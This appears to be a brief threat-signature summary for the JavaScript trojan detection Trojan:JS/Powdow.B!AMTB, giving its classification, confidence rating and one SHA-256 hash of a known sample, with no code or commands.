Trojan:JS/Powdow.B!AMTB - Windows Defender threat signature analysis

=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:JS/Powdow.B!AMTB
Classification:
Type: Trojan
Platform: JS
Family: Powdow
Detection Type: Concrete (known malware family with identified signatures)
Variant: B (specific signature variant within the malware family)
Suffix: !AMTB
Confidence: Very High
False-Positive Risk: Low

Concrete signature match: a Trojan (appears legitimate but performs malicious actions) targeting the JavaScript platform, from the Powdow family.

VDM Static Detection:
Relevant strings associated with this threat:
Known malware associated with this threat (SHA-256):
f8b561cf9304b80fb39f4d714a290ffb12d7a2783bf19f9c4872b002e642eb65
Last updated: 22/03/2026
=== END REPORT ===